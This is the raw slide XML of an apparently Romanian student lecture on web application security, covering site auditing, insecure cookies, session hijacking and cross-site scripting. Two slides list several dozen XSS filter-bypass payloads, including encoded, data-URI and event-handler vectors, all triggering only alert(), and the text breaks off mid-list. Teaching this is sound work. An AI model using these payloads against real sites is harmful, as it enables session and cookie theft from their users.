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5" autoAdjust="0"/>
    <p:restoredTop sz="94660"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="63" d="100"/>
          <a:sy n="63" d="100"/>
        </p:scale>
        <p:origin x="-15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D105-8300-4AEA-B287-9FFA4FDFD1BA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3F88-CDF3-4BC7-9648-F41AB303C9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D105-8300-4AEA-B287-9FFA4FDFD1BA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3F88-CDF3-4BC7-9648-F41AB303C9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D105-8300-4AEA-B287-9FFA4FDFD1BA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3F88-CDF3-4BC7-9648-F41AB303C9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D105-8300-4AEA-B287-9FFA4FDFD1BA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3F88-CDF3-4BC7-9648-F41AB303C9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D105-8300-4AEA-B287-9FFA4FDFD1BA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3F88-CDF3-4BC7-9648-F41AB303C9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D105-8300-4AEA-B287-9FFA4FDFD1BA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3F88-CDF3-4BC7-9648-F41AB303C9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D105-8300-4AEA-B287-9FFA4FDFD1BA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3F88-CDF3-4BC7-9648-F41AB303C9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D105-8300-4AEA-B287-9FFA4FDFD1BA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3F88-CDF3-4BC7-9648-F41AB303C9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D105-8300-4AEA-B287-9FFA4FDFD1BA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3F88-CDF3-4BC7-9648-F41AB303C9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D105-8300-4AEA-B287-9FFA4FDFD1BA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3F88-CDF3-4BC7-9648-F41AB303C9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D105-8300-4AEA-B287-9FFA4FDFD1BA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EFA3F88-CDF3-4BC7-9648-F41AB303C9D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FAD105-8300-4AEA-B287-9FFA4FDFD1BA}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/9/2012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FA3F88-CDF3-4BC7-9648-F41AB303C9DE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packetstormsecurity.org/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.hackaserver.com/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.securitytube.net/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://rstcenter.com/foru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xploit-db.com/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.phrack.com/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://defcamp.ro/" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://seclists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458" y="5181600"/>
            <a:ext cx="114300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5181599"/>
            <a:ext cx="1110829" cy="11429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76500" y="1068584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Securitate Informatica</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="1669196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/>
              <a:t>Securitatea aplicatiilor web</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3771198" y="2576392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Partea I</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="35052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smtClean="0"/>
              <a:t>Microsoft Student Partners</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Asociatia Studentilor la Matematica si Informatica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8201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7820" y="1094151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Auditul manual al unui site</a:t>
            </a:r>
            <a:endParaRPr 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198120" y="2209800"/>
            <a:ext cx="87934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Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Verificarea datelor de intrare:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"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-&gt; Parametri GET</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"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-&gt; Parametri POST</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"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-&gt; Headere HTTP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/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Exploit-uri publice si exploit-uri 0day</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"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Filtrare Javascript vs filtrare pe parte de server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"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Addon-uri Firefox utile: Tamper Data, No Script, Firebug, Cookie Manager</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"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Despre mod_rewrite si ce probleme pune: /user/123</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"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Shared hosting: mai multe site-uri pe acelasi server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Md5 cracking, rainbow tables</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1626499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179832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/>
              <a:t>Insecure Cookie Handling</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="333756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smtClean="0"/>
              <a:t>DEMO</a:t>
            </a:r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3185639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850314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Insecure Cookie Handling</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="297180" y="1676400"/>
            <a:ext cx="7162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smtClean="0"/>
              <a:t>Cookie vs Session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Descriere generala</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Exemplul clasic: login bypass</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Intelegerea cookie-urilor: user_id ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Yahoo: Gammarays si Cookie generator</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Add-on-uri utile: Cookie Manager, Tamper Data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Session fixation/hijacking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Session ID in URL: PHPSESSID=12345…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Man In The Middle</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Predictible token/Brute force</a:t>
            </a:r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480060" y="5673804"/>
            <a:ext cx="843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spprintf(&amp;buf, 0, "%.15s%ld%ld%0.8F", remote_addr ? remote_addr : "", tv.tv_sec, (long int)tv.tv_usec, php_combined_lcg(TSRMLS_C) * 10);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5289232"/>
            <a:ext cx="355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smtClean="0"/>
              <a:t>PHP:  /ext/session/session.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" u="sng"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="274417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1817575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/>
              <a:t>Cross Site Scripting</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2895600" y="3124200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smtClean="0"/>
              <a:t>DEMO</a:t>
            </a:r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3922050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0" y="83820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Cross Site Scripting</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1615619"/>
            <a:ext cx="8458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smtClean="0"/>
              <a:t>Scurta descriere</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Tip: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Reflected: “reflecta” datele trimise de utilizator</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Stored: e pastrat pe server, intr-o baza de date</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>DOM based: welcome.html#name=&lt;script&gt;alert(document.cookie)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>La ce se poate folosi:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>   1) Cookie stealing  (httpOnly)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>   2) Fake Deface</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>   3) Keylogger</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>   4) Denial of Service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>    5)URL spoofing: furt informational</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>    6) Port scanning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>   + Multe altele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46814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676400"/>
            <a:ext cx="861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smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>1) &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>script&gt;alert(1)&lt;/script&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>//basic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smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>2) “&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>script&gt;alert(1)&lt;/script&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>//bypass a open tag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smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>3) &lt;!--&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>img src="--&gt;&lt;img src=x onerror=alert(1)//"&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>//bypass &amp; generate a error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smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>4) “ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>onmouseover=”alert(1)”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> //all javascript events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smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>5) alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>(/XSS/.source) or alert( String(/Test/).substr(1,4) ); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>//some other simple vectors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smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>6) &lt;script&gt;alert(String.fromCharCode(88,83,83</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>));&lt;/script&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>//bypass quotes filters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smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>7) &lt;IMG </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>SRC=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>115…;&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>//unicode injection; utf-8, hex, decimal or octal injection may work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smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>8) &lt;meta </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>http-equiv="refresh" content="0;url=http://;javascript:..." </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>// evasion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smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>9) &lt;style </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>type=text/javascript&gt;alert('xss')&lt;/style&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>//javascript injection based on style tag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-339725">
              <a:buClrTx/>
              <a:buSz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i="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>10) “&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>img src=”x:x” onerror=”alert(0)”&gt; // :</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>D</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" smtClean="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p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smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>11) &lt;META </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"&gt;</a:t>
            </a:r>
          </a:p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smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>12) &lt;META </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"&gt;</a:t>
            </a:r>
          </a:p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smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>13) &lt;XML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>ID="xss"&gt;&lt;I&gt;&lt;B&gt;&amp;lt;IMG SRC="javas&lt;!-- --&gt;cript:alert('XSS')"&amp;gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p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 smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>14) &lt;SPAN DATASRC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>="#xss" DATAFLD="B" DATAFORMATAS="HTML"&gt;&lt;/SPAN&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>//xss in xml document </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-341313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600">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>x='\x61\x6c\x65\x72\x74\x28\x31\x29'; new Function(x)();</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> //something different from  every day </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>injections</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" i="1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0" y="9144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XSS vectors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380701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828800"/>
            <a:ext cx="8610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latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>1) &lt;form </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>id="test" /&gt;&lt;button form="test" formaction="javascript:alert(1)"&gt;X</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>2) &lt;form </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>id=test onforminput=alert(1)&gt;&lt;input&gt;&lt;/form&gt;&lt;button form=test onformchange=alert(2)&gt;X</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>3) &lt;video</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>&gt;&lt;source onerror="javascript:alert(1)"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>4) &lt;video </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>onerror="javascript:alert(1)"&gt;&lt;source&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>5) &lt;math</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>&gt; &lt;maction actiontype="statusline#http://google.com" xlink:href="javascript:alert(1)"&gt;CLICKME&lt;/maction&gt; &lt;/math&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>6) &lt;comment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>&gt;&lt;img src="&lt;/comment&gt;&lt;img src=x onerror=alert(1))//"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>7) &lt;div </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)&gt;&lt;/div&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>8) &lt;head</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>&gt;&lt;base href="javascript://"&gt;&lt;/head&gt;&lt;body&gt;&lt;a href="/. /,alert(1)//#"&gt;XXX&lt;/a&gt;&lt;/body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>9) &lt;object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>10) &lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>href=java&amp;#1&amp;#2&amp;#3&amp;#4&amp;#5&amp;#6&amp;#7&amp;#8&amp;#11&amp;#12script:alert(1)&gt;XXX&lt;/a&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>11) &lt;title </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>onpropertychange=alert(1)&gt;&lt;/title&gt;&lt;title title=&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>12) &lt;style&gt;p[foo=bar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>{}*{-o-link:'javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};&lt;/style&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>13) &lt;style</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>&gt;@import "data:,*%7bx:expression(write(1))%7D";&lt;/style&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
